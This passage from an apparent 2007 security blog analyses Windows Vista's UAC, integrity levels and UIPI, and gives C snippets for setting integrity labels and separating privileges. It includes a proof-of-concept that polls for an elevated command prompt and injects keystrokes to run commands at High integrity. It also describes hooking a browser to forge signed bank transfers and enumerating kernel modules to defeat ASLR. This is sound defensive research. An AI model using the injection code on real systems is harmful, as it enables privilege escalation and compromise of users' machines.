  2. Another approach is to dramatically redesign the whole OS in such a way that all components (like e.g. drivers and services) are compartmentalized, e.g. run as separate processes in usermode, and consequently are isolated not only from each other but also from the OS kernel (a microkernel). The idea here is that the most critical component, i.e. the microkernel, is very small and can be easily verified. An example of such an OS is MINIX3, which is still under development though.

    Undoubtedly this is a very good approach to minimize impact from system or driver faults, but does not protect us against malicious system compromises. After all if an attacker exploits a bug in a web browser, she may only be interested in modifying the browser’s code. Sure, she probably would not be able to get access to the micro kernel, but why would she really need it?

    Imagine, for example, the following common scenario: many online banking systems require users to use smart cards to sign all transaction requests (e.g. money transfers). This usually works by having the browser (more specifically an ActiveX control or a Firefox plugin) display a message to the user that he or she is about to make e.g. a wire transfer to a given account number for a given amount of money. If the user confirms that action, they press an 'Accept' button, which instructs the browser to send the message to the smart card for signing. The message itself is usually just some kind of formatted text specifying the source and destination account numbers, the amount of money, a date and time stamp, etc. Then the user is asked to insert the smart card, which contains his or her private key (issued by the bank), and to also enter the PIN code. The latter can be done either using the same browser applet or, in slightly more secure implementations, on the smart card reader itself, if it has a pad for entering PINs.

    Obviously the point here is that malware should not be able to forge the digital signature and only the legitimate user has access to the smart card and also knows the card’s PIN, so nobody else will be able to sign that message with the user’s key.

    However, it's enough for the attacker to replace the message while it's being sent to the card, while displaying the original message in the browser's window. This can all be done by just modifying ("hooking") the browser's in-memory code and/or data. No need for kernel malware, yet the system (the browser, more specifically) is compromised!


    Still, one good thing about such a system design is that if we don't allow an attacker to compromise the microkernel, then, at least in theory, we can write a detector capable of finding that some (malicious) changes to the browser's memory have indeed been introduced. However, in practice, we would have to know exactly how the browser's memory should look, e.g. which function pointers in Firefox's code should be verified, in order to find out whether such a compromise has indeed occurred. Unfortunately, we cannot do that today.

  3. An alternative approach to the above two, which does not require any dramatic changes to the OS, is to make use of so-called sound static code analyzers to verify all sensitive code in the OS and applications. The soundness property assures that the analyzer has been mathematically proven not to miss even a single potential run-time error, which includes e.g. unintentional execution flow modifications. The catch here is that soundness doesn't mean that the analyzer doesn't generate false positives. It's actually mathematically proven that we can't have such an ideal tool (i.e. with a zero false positive rate), as the problem of precisely analyzing all possible program execution paths is undecidable. Thus, practical analyzers always consider some superset of all possible execution flows, which is easy to compute, yet may introduce false alarms, and the whole trick is to choose that superset so that the number of false positives is minimal (see the toy example right after this list).

    ASTREE is an example of a sound static code analyzer for the C language (although it doesn't support programs which make use of dynamic memory allocation) and it apparently has been used to verify the primary flight control software for the Airbus A340 and A380. Unfortunately, there don't seem to be any publicly available sound static analyzers for binary code… (if anybody knows of any, you're more than welcome to paste the links under this post – just please make sure you're referring to sound analyzers).

    If we had such a sound and precise (i.e. with a minimal rate of false alarms) binary static code analyzer, that could be a big breakthrough in OS and application security.

    We could imagine, for example, a special authority for signing device drivers for various OSes: it would first perform such formal static validation on submitted drivers and, once they passed the test, the drivers would be digitally signed. Plus, the OS kernel itself would be validated by the vendor and would accept only those drivers signed by the driver verification authority. The authority could be the OS vendor itself or a separate 3rd party organization. Additionally, we could also require that the code of all security-critical applications, like e.g. the web browser, be signed by such an authority, and set a special policy in our OS to allow e.g. only signed applications to access the network.

    The one weak point here is that if the private key used by the certification authority gets compromised, then the game is over and nobody really knows it… For this reason it would be good to have more than one certification authority and to require that each driver/application be signed by at least two independent authorities.
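To illustrate the false-positive problem mentioned in point 3, here is a toy C fragment I made up for this post (not taken from any real analyzer's test suite): the array access is provably safe, but seeing that requires tracking the relation between the two variables, which a simple non-relational abstraction (e.g. plain intervals) loses – so a sound analyzer using it must raise an alarm here to stay on the safe side.

/* Hypothetical example of a sound-analyzer false positive.
 * buf[a] is always in bounds: a >= 0, b >= 0 and a + b == 5 together imply a <= 5.
 * An analyzer that only tracks each variable's interval separately knows merely
 * that a lies in [0, 1000], so - to remain sound - it has to report a possible
 * out-of-bounds write, even though none can ever happen. */
void store(int a, int b)
{
    int buf[10];

    if (a >= 0 && a <= 1000 && b >= 0 && b <= 1000 && a + b == 5) {
        buf[a] = 1;   /* safe, but flagged by a non-relational abstraction */
    }
}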

Of the above three approaches, only the last one can guarantee that our system will never get compromised. The only problem is that… there are no tools today for static binary code analysis that are proven to be sound and are also precise enough to be used in practice…

So, today, as far as proactive solutions are concerned, we're left only with solutions #1 and #2, which, as discussed above, cannot protect the OS and applications from compromises 100% of the time. And, to make things worse, they do not offer any clue as to whether a compromise actually occurred.

That's why I'm trying so hard to promote the idea of Verifiable Operating Systems, which should allow us to at least find out (in a systematic way) whether the system in question has been compromised or not (though, unfortunately, not whether a single-shot incident occurred). The point is that the number of required design changes should be fairly small. There are some problems with it too, like e.g. verifying JIT-generated code, but hopefully they can be solved in the near future. Expect me to write more on this topic in the near future.

Special thanks to Halvar Flake for eye-opening discussions about sound code analyzers and OS security in general.

Monday, March 05, 2007

Handy Tool To Play with Windows Integrity Levels

Mark Minasi wrote to me recently to point out that his new tool, chml, is capable of setting NoReadUp and NoExecuteUp policy on file objects, in addition to the standard NoWriteUp policy, which is used by default on Vista.

As I wrote before, the default IL policy used on Vista assumes only the NoWriteUp policy. That means that all objects which do not have any IL assigned explicitly (and consequently are treated as if they were marked with Medium IL) can be read by low integrity processes (only writes are prevented). Also, the standard Windows icacls command, which allows setting the IL for file objects, always assumes only the NoWriteUp policy (unless I'm missing some secret switch).

However, it’s possible, for each object, to define not only the integrity level but also the policy which will be used to access it. All this information is stored in the same SACE which also defines the IL.

There doesn’t seem to be too much documentation from Microsoft about how to set those permissions, except this paper about Protected Mode IE and the sddl.h file itself.

Anyway, it's good to see a tool like chml, as it allows one to do some cool things in a very simple way. E.g. consider that you have some secret documents in the folder c:\secrets and that you don't feel like sharing those files with anybody who can exploit your Protected Mode IE. As I pointed out in my previous article, by default all your personal files are accessible to your Protected Mode IE low integrity process, so in the event of successful exploitation the attacker is free to steal them all. However, now, using Mark Minasi's tool, you can just do this:
chml.exe c:\secrets -i:m -nr -nx
This should prevent all the low IL processes, like e.g. Protected Mode IE, from reading the contents of your secret directory.

BTW, you can use chml to also examine the SACE which was created:
chml.exe c:\secrets -showsddl
and you should get something like that as a result:
SDDL string for c:\secrets's integrity label=S:(ML;OICI;NRNX;;;ME)
Where S means that it's an SACE (in contrast to e.g. a DACE), ML says that this ACE defines a mandatory label, OICI means "Object Inherit" and "Container Inherit", NRNX says that the NoReadUp and NoExecuteUp policies should be used to access this object (which BTW also implies NoWriteUp), and finally ME stands for Medium integrity level.
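For those who prefer the raw Win32 API, here is roughly what such a tool has to do under the hood (my own sketch of the documented SDDL/SetNamedSecurityInfo route – I have not looked at chml's actual source, so take it as an approximation): convert the SDDL label string into a security descriptor and attach its SACL to the folder.

#include <windows.h>
#include <sddl.h>
#include <aclapi.h>
#include <stdio.h>
#pragma comment(lib, "advapi32")

int main(void)
{
    /* Same label as above: mandatory label ACE, inherited by files and
     * subfolders (OICI), NoReadUp+NoExecuteUp policy (NRNX), Medium level (ME). */
    PSECURITY_DESCRIPTOR sd = NULL;
    PACL sacl = NULL;
    BOOL present = FALSE, defaulted = FALSE;
    WCHAR path[] = L"c:\\secrets";
    DWORD err;

    if (!ConvertStringSecurityDescriptorToSecurityDescriptorW(
            L"S:(ML;OICI;NRNX;;;ME)", SDDL_REVISION_1, &sd, NULL)) {
        printf("SDDL conversion failed: %lu\n", GetLastError());
        return 1;
    }
    GetSecurityDescriptorSacl(sd, &present, &sacl, &defaulted);

    /* Attach only the label (SACL) part - owner, group and DACL stay untouched. */
    err = SetNamedSecurityInfoW(path, SE_FILE_OBJECT, LABEL_SECURITY_INFORMATION,
                                NULL, NULL, NULL, sacl);
    printf("SetNamedSecurityInfo: %lu\n", err);
    LocalFree(sd);
    return err == ERROR_SUCCESS ? 0 : 1;
}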

All credits go to Mark Minasi and the Windows IL team :)

As a side note: the updated slides for my recent Black Hat DC talk about cheating hardware based memory acquisition can be found here. You can also get the demo movies here.

Tuesday, February 13, 2007

Confusion About The "Joke Post"

It seems that many people didn’t fully understand why I wrote the previous post – Vista Security Model – A Big Joke... There are two things which should be distinguished:

1) The fact that UAC design assumes that every setup executable should be run elevated (and that a user doesn't really have a choice to run it from a non-elevated account),

2) The fact that UAC implementation contains bug(s), like e.g. the bug I pointed out in my article, which allows a low integrity level process to send WM_KEYDOWN messages to a command prompt window running at high integrity level.

I was pissed off not because of #1, but because Microsoft employee - Mark Russinovich - declared that all implementation bugs in UAC are not to be considered as security bugs.

True, I also don't like the fact that UAC forces users to run every setup program with elevated privileges (fact #1), but I can understand such a design decision (as being a compromise between usability and security) and this was not the reason why I wrote "The Joke Post".

Monday, February 12, 2007

Vista Security Model – A Big Joke?

[Update: if you came here from ZDNet or Slashdot - see the post about confusion above!]

Today I saw a new post on Mark Russinovich's blog, which I take as a response to my recent musings about Vista security features, where I pointed out several problems with UAC, like e.g. the attack that allows a low integrity process to hijack a high integrity level command prompt. Those who read the whole article undoubtedly noticed that my overall opinion of Vista's security changes was still very positive – after all, everybody can make mistakes, and the fact that UAC is not perfect doesn't diminish the fact that it's a step in the right direction, i.e. implementing a least-privilege policy in the Windows OS.

However, I now read this post by Mark Russinovich (a Microsoft employee), which says:
"It should be clear then, that neither UAC elevations nor Protected Mode IE define new Windows security boundaries. Microsoft has been communicating this but I want to make sure that the point is clearly heard. Further, as Jim Allchin pointed out in his blog post Security Features vs Convenience, Vista makes tradeoffs between security and convenience, and both UAC and Protected Mode IE have design choices that required paths to be opened in the IL wall for application compatibility and ease of use."

And then we read:
"Because elevations and ILs don’t define a security boundary, potential avenues of attack, regardless of ease or scope, are not security bugs. So if you aren’t guaranteed that your elevated processes aren’t susceptible to compromise by those running at a lower IL, why did Windows Vista go to the trouble of introducing elevations and ILs? To get us to a world where everyone runs as standard user by default and all software is written with that assumption."

Oh, excuse me, is this supposed to be a joke? We all remember all those Microsoft statements about how serious Microsoft is about security in Vista and how all those new cool security features like UAC or Protected Mode IE will improve the world's security. And now we hear what? That this flagship security technology (UAC) is in fact… not a security technology!

I understand that implementing the UAC, UIPI and Integrity Level mechanisms on top of the existing Windows OS infrastructure is a hard task, that it would be much easier to design a whole new OS from scratch, and that Microsoft can't do this for various reasons. I understand all that, but does that mean that once more people at Microsoft realized it too, they should turn everything into a big joke? Or maybe I'm too much of an idealist…

So, I will say this: If Microsoft won’t change their attitude soon, then in a couple of months the security of Vista (from the typical malware’s point of view) will be equal to the security of current XP systems (which means, not too impressive).

Sunday, February 04, 2007

Running Vista Every Day!

More than a month ago I installed Vista RTM on my primary laptop (an x86 machine) and have been running it almost every day since. Below are some of my reflections on the new security model introduced in Vista, its limitations, a few flaws, and some practical info about how I configured my system.

UAC – The Good and The Bad

User Account Control (UAC) is a new security mechanism introduced in Vista, whose primary goal is to force users to work using restricted accounts, instead of working as administrators. This is, in my opinion, the most important security mechanism introduced in Vista. That doesn’t mean it cannot be bypassed in many ways (due to implementation flaws), but just the fact that such a design change has been made to Windows is, without doubt, a great step towards securing consumer OSes.

When UAC is active (which is the default setting), even when the user logs in as an administrator, most of her programs run as restricted processes, i.e. they have only a very limited subset of privileges in their process token. Also, they run at the so-called Medium integrity level, which, among other things, should prevent those applications from interacting with higher integrity level processes via window messages. This mechanism also got a nice marketing acronym, UIPI, which stands for User Interface Privilege Isolation. Once the system determines that a given program (or a given action) requires administrative privileges, e.g. because the user wants to change the system time, it displays a consent window, asking her whether she really wants to proceed. If the user logged in as a normal user (i.e. the account does not belong to the Administrators group), then she is also asked to enter the password for one of the administrator accounts. You can find more background information about UAC, e.g. at this page.

Many people complain about UAC, saying that it’s very annoying to see the UAC consent dialog box appear every few minutes or so, and claim that this will discourage users from using the mechanism at all (and yes, there’s an option to disable UAC). I strongly disagree with this opinion – I’ve been running Vista for more than a month now and, besides the first few days when I was installing various applications, I now do not see the UAC prompt more than 1-2 times per day. So, I really wonder what those people are doing that makes UAC appear every other minute…

One thing that I found particularly annoying, though, is that Vista automatically assumes that all setup programs (application installers) should be run with administrator privileges. So, when you try to run such a program, you get a UAC prompt and you have only two choices: either agree to run the application as administrator, or disallow running it at all. That means that if you downloaded some freeware Tetris game, you will have to run its installer as administrator, giving it not only full access to your entire file system and registry, but also allowing it e.g. to load kernel drivers! Why should a Tetris installer be allowed to load kernel drivers?

How does Vista recognize installer executables? It has a compatibility database and also uses several heuristics, e.g. checking whether the file name contains the string “setup” (really, I’m not kidding!). Finally, it looks at the executable’s manifest – most modern installers are expected to have such a manifest embedded, and it may indicate that the executable should be run as administrator.

To get around this problem, e.g. on XP, I would normally just add appropriate permissions to my normal (restricted) user account, in such a way that this account would be able to add new directories under C:\Program Files and to add new keys under HKLM\Software (in most cases this is just enough), but still would not be able to modify any global files or registry keys, nor, heaven forbid, to load drivers. More paranoid people could choose to create a separate account, called e.g. installer, and use it to install most of the applications. Of course, real life is not that beautiful and you sometimes need to play a bit with regmon to tweak the permissions, but in general it works for the majority of applications and I have been successfully using this approach for years now on my XP box.

That approach would not work on Vista, because every time Vista detects that an executable is a setup program (and believe me, Vista is really good at doing this), it will only allow running it as administrator… It is possible to disable the heuristics-based installer detection via the local security policy settings, but that doesn’t seem to work for those installer executables whose embedded manifest says they should be run as administrator.

I see the above limitation as a very severe hole in the design of UAC. After all, I would like to be offered a choice: whether to fully trust a given installer executable (and run it as full administrator), or to just allow it to add a folder in C:\Program Files and some keys under HKLM\Software and do nothing more. I could do that under XP, but apparently I can’t under Vista, which is a bit disturbing (unless I’m missing some secret option to change that behavior).

Integrity Levels – Protect the OS but not your data!

The Integrity Levels (IL) mechanism has been introduced to help implement UAC. The mechanism is very simple – every process can be assigned one of four possible integrity levels:

• Low
• Medium
• High
• System

Similarly, every securable object in the system, like e.g. a directory, file or registry key, can also be assigned an integrity level. An integrity level is nothing else than an ACE of a special type placed in the object’s SACL. If there’s no such ACE at all, then the integrity level of the object is assumed to be Medium. You can use the icacls command to see integrity levels on file system objects:
C:\>icacls \Users\joanna\AppData\LocalLow
\Users\joanna\AppData\LocalLow silverose\joanna:(F)
silverose\joanna:(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
BUILTIN\Administrators:(F)
BUILTIN\Administrators:(OI)(CI)(IO)(F)
Mandatory Label\Low Mandatory Level:(OI)(CI)(NW)
BTW, I don’t know of any tool/command to see and modify integrity levels assigned to registry keys (I think I know how to do it in C, though). Anybody?
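Until somebody points me to a ready-made tool, here is a minimal C sketch of how it could be done programmatically – it puts a Low IL label (with the default NoWriteUp policy) on a test key; the key path is just an example I made up:

#include <windows.h>
#include <sddl.h>
#include <aclapi.h>
#include <stdio.h>

// Minimal sketch (not production code): put a Low IL label on a registry key.
// "LW" in the SDDL string is the Low mandatory level, "NW" means NoWriteUp.
int main(void)
{
    PSECURITY_DESCRIPTOR pSD = NULL;
    PACL pSacl = NULL;
    BOOL present = FALSE, defaulted = FALSE;
    wchar_t keyName[] = L"CURRENT_USER\\Software\\LowIlTest";   // example key
    HKEY hKey;
    DWORD err;

    // create a test key to play with
    RegCreateKeyExW(HKEY_CURRENT_USER, L"Software\\LowIlTest", 0, NULL, 0,
                    KEY_ALL_ACCESS, NULL, &hKey, NULL);
    RegCloseKey(hKey);

    // build a SACL containing just the mandatory label ACE
    if (!ConvertStringSecurityDescriptorToSecurityDescriptorW(
            L"S:(ML;;NW;;;LW)", SDDL_REVISION_1, &pSD, NULL))
        return 1;
    if (!GetSecurityDescriptorSacl(pSD, &present, &pSacl, &defaulted))
        return 1;

    // apply the label (note the "CURRENT_USER\\..." naming convention
    // used by SetNamedSecurityInfo for SE_REGISTRY_KEY objects)
    err = SetNamedSecurityInfoW(keyName, SE_REGISTRY_KEY,
                                LABEL_SECURITY_INFORMATION,
                                NULL, NULL, NULL, pSacl);
    printf("SetNamedSecurityInfo returned %lu\n", err);
    LocalFree(pSD);
    return 0;
}

Reading the label back should work analogously with GetNamedSecurityInfo and the same LABEL_SECURITY_INFORMATION flag.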

Now, the whole concept behind IL is that a process can only get write access to those objects which have the same or a lower integrity level than the process itself.

Update (March 5th, 2007): This is the default behavior of IL and is indicated by the “(NW)” symbol in the listing above, which stands for the NoWriteUp policy. I have just learned that one can use the chml tool by Mark Minasi to set a different policy, i.e. NoReadUp (NR) or NoExecuteUp (NX), which results in the IL mechanism not allowing a lower integrity process to read or execute objects marked with a higher IL. See also my recent post about this tool.

UAC is implemented using IL – even if you log in as administrator, all your processes (like e.g. explorer.exe) run at Medium IL. Once you elevate to the “real admin”, your process runs at High IL. System processes, like e.g. services, run at System IL. From a security point of view, High IL seems to be equivalent to System IL, because once you are allowed to execute code at High IL you can compromise the whole system.
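If you want to check what IL your processes actually got, you can query the process token – here is a minimal sketch (my own illustration, nothing that ships with Vista) that prints the integrity RID of the current process; compile it and run it from a normal, an elevated and a Low IL process to see the difference:

#include <windows.h>
#include <stdio.h>

// Minimal sketch: print the integrity level RID of the current process token.
int main(void)
{
    HANDLE hToken;
    BYTE buf[256];
    DWORD len = 0, rid;
    TOKEN_MANDATORY_LABEL *pTIL = (TOKEN_MANDATORY_LABEL *)buf;

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
        return 1;
    if (!GetTokenInformation(hToken, TokenIntegrityLevel, buf, sizeof(buf), &len))
        return 1;

    // The IL is encoded as the last sub-authority of the label SID:
    // 0x1000 = Low, 0x2000 = Medium, 0x3000 = High, 0x4000 = System.
    rid = *GetSidSubAuthority(pTIL->Label.Sid,
                              *GetSidSubAuthorityCount(pTIL->Label.Sid) - 1);
    printf("Integrity level RID: 0x%lx\n", rid);

    CloseHandle(hToken);
    return 0;
}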

Internet Explorer’s protected mode is implemented using the IL mechanism. The iexplore.exe process runs at Low IL and, in a system with default configuration, can only write to %USERPROFILE%\AppData\LocalLow and HKCU\Software\AppDataLow because all other objects have higher ILs (usually Medium).

If you don’t like surfing using IE, you can very easily set up your Firefox (or another browser of your choice) to run as a Low integrity process (here I assume that the Firefox user profile is in j:\config\firefox-profile):
C:\Program Files\Mozilla Firefox>icacls firefox.exe /setintegritylevel low
J:\config>icacls firefox-profile /setintegritylevel (OI)(CI)low
Because firefox.exe is now marked as a Low integrity file, Vista will also create a Low integrity process from this file, unless you start the executable from a High integrity process (e.g. an elevated command prompt). Also, if you, for some reason (see below), wanted to use runas or psexec to start a Low integrity process, it won’t work – the process will be started at Medium IL, regardless of the executable being marked as Low integrity.
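BTW, if you prefer to do it programmatically, the documented way (as far as I can tell) seems to be to duplicate your own token, lower its IL and pass it to CreateProcessAsUser – below is a rough sketch with error handling omitted (the firefox.exe path is just an example):

#include <windows.h>
#include <sddl.h>

// Rough sketch: start a child process at Low IL by lowering the IL of a
// duplicated copy of our own primary token. Error handling omitted.
int main(void)
{
    HANDLE hToken = NULL, hNewToken = NULL;
    PSID pLowSid = NULL;
    TOKEN_MANDATORY_LABEL til = {0};
    STARTUPINFOW si = { sizeof(si) };
    PROCESS_INFORMATION pi = {0};
    wchar_t cmdline[] = L"\"C:\\Program Files\\Mozilla Firefox\\firefox.exe\"";

    OpenProcessToken(GetCurrentProcess(),
                     TOKEN_DUPLICATE | TOKEN_ADJUST_DEFAULT |
                     TOKEN_QUERY | TOKEN_ASSIGN_PRIMARY, &hToken);
    DuplicateTokenEx(hToken, 0, NULL, SecurityImpersonation,
                     TokenPrimary, &hNewToken);

    // S-1-16-4096 is the Low mandatory level SID
    ConvertStringSidToSidW(L"S-1-16-4096", &pLowSid);
    til.Label.Attributes = SE_GROUP_INTEGRITY;
    til.Label.Sid = pLowSid;
    SetTokenInformation(hNewToken, TokenIntegrityLevel, &til,
                        sizeof(til) + GetLengthSid(pLowSid));

    // the new process inherits the Low IL from the token we pass here
    CreateProcessAsUserW(hNewToken, NULL, cmdline, NULL, NULL, FALSE,
                         0, NULL, NULL, &si, &pi);
    return 0;
}

Note that this only lowers the IL – it does not switch to a different user account, which is a separate problem (see the runas/psexec trick below).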

It should be stressed that IL, by default, protects only against modifications of higher integrity objects. It’s perfectly ok for a Low IL process to read e.g. files, even if they are marked with Medium or High IL. In other words, if somebody exploits IE running in Protected Mode (at Low IL), she will be able to read (i.e. steal) all the user’s data.

This is not an implementation bug, this is a design decision, and it’s cleverly called the “read-up policy”. If we think about it for a while, it should become clear why Microsoft decided to do it that way. First, we should observe that what Microsoft is most concerned about is malware which permanently installs itself in the system and could later be detected by some anti-malware programs. Microsoft doesn’t like that, because it’s the source of all the complaints about how insecure Windows is, and also because the A/V companies can publish their statistics about what percentage of computers is compromised, etc… All in all, a very uncomfortable situation, not only for Microsoft but also for all those poor users, who now need to try all the various methods (read: buy A/V programs) to remove the malware, instead of just focusing on their work…

On the other hand, imagine a reliable exploit (i.e. one not crashing the target too often) which, after exploiting e.g. the IE Protected Mode process, steals all the user’s DOC and XLS files, sends them somewhere and afterwards disappears in an elegant fashion. Our user, busy with his everyday work, does not even notice anything, so he can continue working undisturbed and focus on his real job. The A/V programs do not detect the exploit (why should they? – after all, there’s no signature for it, nor does the shellcode use any suspicious API), so they do not report the machine as infected – because, after all, it’s not infected. So the statistics look better and everybody is generally happier. Including the competition, who now have access to the stolen data ;)

User Interface Privilege Isolation and a Little Fun

The UAC and Integrity Level mechanisms make it possible for processes running at different ILs to share the same desktop. This raises a potential security problem, because Windows allows one process to send a “window message”, like e.g. WM_SETTEXT, to another process. Moreover, some messages, like e.g. the infamous WM_TIMER, could be used to redirect the execution flow of the target thread. This was popular a few years ago in the so-called “Shatter Attacks”.

UIPI, introduced in Vista, comes to the rescue. UIPI basically enforces the obvious policy that lower integrity processes cannot send messages to higher integrity processes.

Interestingly, the UIPI implementation is a bit “unfinished”, I would say… For example, contrary to the design assumption, on my system at least, it is possible for a Low integrity process to send e.g. WM_KEYDOWN messages to an open administrative shell (cmd.exe) running at High IL and get arbitrary commands executed.

One simple attack scenario is that a malicious program, running at Low IL, waits for the user to open an elevated command prompt – it can e.g. poll the open window handles every second or so (window enumeration is allowed even at Low IL). Once it finds the window, it can send commands to execute… Probably not as cool as the recent “Vista Speech Exploit”, but still something to play with ;)
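Here is a rough sketch of such a polling loop – just an illustration of the idea, using WM_CHAR for simplicity; whether the messages actually reach the High IL window depends, of course, on the UIPI gap described above, and the window-title check is a naive heuristic:

#include <windows.h>
#include <string.h>

// Naive sketch: poll for an elevated cmd.exe window (its title starts with
// "Administrator:") and post keystrokes to it. This only works because of
// the UIPI implementation gap described above.
static HWND g_hTarget = NULL;

static BOOL CALLBACK FindElevatedCmd(HWND hwnd, LPARAM lParam)
{
    char title[256] = {0};
    (void)lParam;
    GetWindowTextA(hwnd, title, sizeof(title) - 1);
    if (strncmp(title, "Administrator:", 14) == 0) {
        g_hTarget = hwnd;
        return FALSE;            // stop enumeration
    }
    return TRUE;
}

int main(void)
{
    const char *cmd = "calc\r";  // command to "type" into the elevated shell
    const char *p;

    while (!g_hTarget) {         // poll until an elevated prompt shows up
        EnumWindows(FindElevatedCmd, 0);
        Sleep(1000);
    }
    for (p = cmd; *p; p++)
        PostMessageA(g_hTarget, WM_CHAR, (WPARAM)*p, 0);
    return 0;
}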

It’s my feeling that there are more holes in UAC, but I will leave finding them all as an exercise for the readers...

Do-It-Yourself: Implementing Privilege Separation

Because of the limitations of UAC and IL mentioned above (i.e. the read-up policy), I decided to implement a little privilege-separation scheme in my system. The first thing we need is to create a few more accounts, each for a specific type of application or task. E.g. I decided that I want a separate account to run my web browser, a different one for running my email client as well as my IM client (which I occasionally run), and a whole other account to deal with my super-secret projects. And, of course, I need a main account, that is, the one I will use to log in to the system. All in all, here is the list of all the accounts on my Vista laptop:

admin
joanna
joanna.web
joanna.email
joanna.sensitive

So, joanna is used to log into the system (this is, BTW, a truly limited account, i.e. it doesn’t belong to the Administrators group), and Explorer and all applications like e.g. Picasa are started using this account. Firefox and Thunderbird run as joanna.web and joanna.email respectively. However, a little trick is needed here if we want to start those applications as Low IL processes (and we want to do this, because we want UIPI to protect, at least in theory, other applications from the web and mail clients if they got compromised somehow). As mentioned above, if one uses runas or psexec, the created process will run at Medium IL, regardless of the integrity level assigned to the executable. We can get around this by using this simple trick (note the nested quotations):
runas /user:joanna.web "cmd /c start \"c:\Program Files\Mozilla Firefox\firefox.exe\""
c:\tools\psexec -d -e -u joanna.web -p l33tp4ssw0rd "cmd" "/c start "c:\Program Files\Mozilla Firefox\firefox.exe""
Obviously, we also need to set appropriate ACLs on the directories containing the Firefox and Thunderbird user profiles, so that each of those two users gets full access to the respective directory as well as to a \tmp folder used to store email attachments and downloaded files. No other personal files should be accessible to joanna.web and joanna.email.

Finally, being the paranoid person I am, I also have a special user, joanna.sensitive, which is the only one granted access to my \projects directory. It may come as a surprise, but I decided to make joanna.sensitive a member of the Administrators group. The reason is that I need all the applications which run as joanna.sensitive (e.g. gvim, cmd, Visual Studio, KeePass, etc.) to have their UI isolated from all other normal applications, which run as joanna at Medium IL. It seems that the only way to start a process at High IL is to make its account part of the Administrators group and then use ‘Run As Administrator’ or the runas command to start it.

That way we have the highly dangerous applications, like the web browser or email client, running at Low IL and as very limited users (joanna.web and joanna.email), who have access only to the necessary profile directories (this restriction applies to both read and write accesses, because it’s enforced by normal ACLs on file system objects and not by the IL mechanism). Then we have all other applications, like Explorer, various Office applications, etc., running as joanna at Medium IL. And finally the most critical programs – those running as joanna.sensitive, like KeePass and those which get access to my \projects directory – all run at High IL.

Thunderbird, GPG and Smart Cards

Even though the above configuration might look good, there’s still a problem with it I haven’t solved yet. The problem is related to mail encryption and how to isolate the email client from my PGP private keys. I use Thunderbird together with the Enigmail OpenPGP extension. The extension is just a wrapper around gpg.exe, the GnuPG implementation of PGP. When I open an encrypted email, my Thunderbird process spawns a new gpg.exe process and passes the passphrase to it as an argument. There are two alarming things here – first, the Thunderbird process needs to know my passphrase (in fact I enter it into a dialog box displayed by the Enigmail extension), and second, the gpg.exe process runs as the same user and at the same IL as the thunderbird.exe process. So, if thunderbird.exe gets compromised, the malicious code executing inside it will not only be able to learn my passphrase, but will also be free to read my private key from disk (because it has the same rights as gpg.exe).

Theoretically it should be possible to solve the passphrase-stealing problem by using GPG Agent, which could run in the background as a service; gpg.exe would then ask the agent for the passphrase instead of asking the thunderbird.exe process, which would never be in possession of the passphrase. Ignoring the fact that there doesn’t seem to be a working GPG Agent implementation for the Win32 environment, this still is not a good solution, because thunderbird.exe still gets access to the gpg.exe process, which is its own child after all – so it’s possible for thunderbird.exe to read the contents of gpg.exe’s memory and find the decrypted PGP private key there.

It would help if GPG were implemented as a service running in the background, with thunderbird.exe only communicating with it using some sort of LPC to send requests to encrypt, decrypt, sign and verify buffers. Unfortunately, I’m not aware of such an implementation, especially for Win32.
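Just to illustrate the idea (this is purely hypothetical – no such service exists), the interface could be as simple as a named pipe owned by a separate crypto-service process, so that the key and passphrase never enter the mail client’s address space; the actual crypto is stubbed out here:

#include <windows.h>

// Hypothetical sketch only: a separate "crypto service" process owns the
// private key and passphrase; clients (e.g. thunderbird.exe) talk to it over
// a named pipe and only ever see ciphertext/plaintext buffers, never the key.
static void decrypt_buffer(char *buf, DWORD len)
{
    // ...the real PGP/GPG engine would be called here; the key never
    // leaves this process...
    (void)buf; (void)len;
}

int main(void)
{
    char buf[4096];
    DWORD got, written;
    HANDLE hPipe = CreateNamedPipeA("\\\\.\\pipe\\gpg-service",
        PIPE_ACCESS_DUPLEX,
        PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE | PIPE_WAIT,
        1, sizeof(buf), sizeof(buf), 0, NULL);
    if (hPipe == INVALID_HANDLE_VALUE)
        return 1;

    for (;;) {
        BOOL connected = ConnectNamedPipe(hPipe, NULL) ||
                         GetLastError() == ERROR_PIPE_CONNECTED;
        if (!connected)
            continue;
        if (ReadFile(hPipe, buf, sizeof(buf), &got, NULL)) {
            decrypt_buffer(buf, got);                     // request: ciphertext in
            WriteFile(hPipe, buf, got, &written, NULL);   // reply: plaintext out
        }
        DisconnectNamedPipe(hPipe);
    }
}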

The only practical solution seems to be to use a smart card, which would perform all the necessary crypto operations using its own processor. Unfortunately, GnuPG supports only so-called OpenPGP smart cards, and it seems that the only two cards which implement this standard (i.e. the Fellowship card and the g10 card) support only 1024-bit RSA keys, which is definitely not enough for even a moderately paranoid person ;)

As a last hope, I turned to commercial PGP and downloaded the trial of PGP Desktop, and… it turned out that it doesn’t support Vista yet (what a shame, BTW).

So, for the time being I’m defenseless like a baby against all those mean people who would try to exploit my thunderbird.exe and steal my private PGP key :(

The forgotten part: Detection

One might think that this is a pretty secure system configuration… Well, more precisely, it could be considered pretty secure if UIPI were not buggy, if UAC didn’t force me to run random setup programs with full administrator rights, and if GPG supported smart cards with RSA keys > 1024 bits (or, alternatively, if PGP Desktop supported Vista). But let’s not be that scrupulous and let’s forget about those minor problems…

Still, even though that might look like a secure configuration, this is all just an illusion of security! The whole security of the system can be compromised if an attacker finds and exploits e.g. a bug in a kernel driver.

It should be noted that Microsoft has also implemented several anti-exploitation techniques in Vista; the two most advertised are Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP). However, ASLR does not protect against local kernel exploitation, because it’s possible, even for a Low IL process, to query the system for the list of loaded kernel modules together with their base addresses (using the ZwQuerySystemInformation function). Also, hardware DEP, which works only on 64-bit processors, is not applied to the whole non-paged pool (as well as some other areas, but the non-paged pool is the biggest one). In other words, the hardware NX bit is not set on all pages comprising the non-paged pool. BTW, there is a reason for Microsoft doing this, and it is not due to compatibility issues (at least I believe so). I wonder who else can guess... ;)
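For those who wonder how easy the kernel module enumeration is, here is a rough sketch – the structure layout is the usual undocumented one, so treat it as an assumption rather than an official API:

#include <windows.h>
#include <stdio.h>

// Rough sketch: list loaded kernel modules and their base addresses from
// user mode via NtQuerySystemInformation(SystemModuleInformation).
// The structures below are undocumented; layouts copied from common usage.
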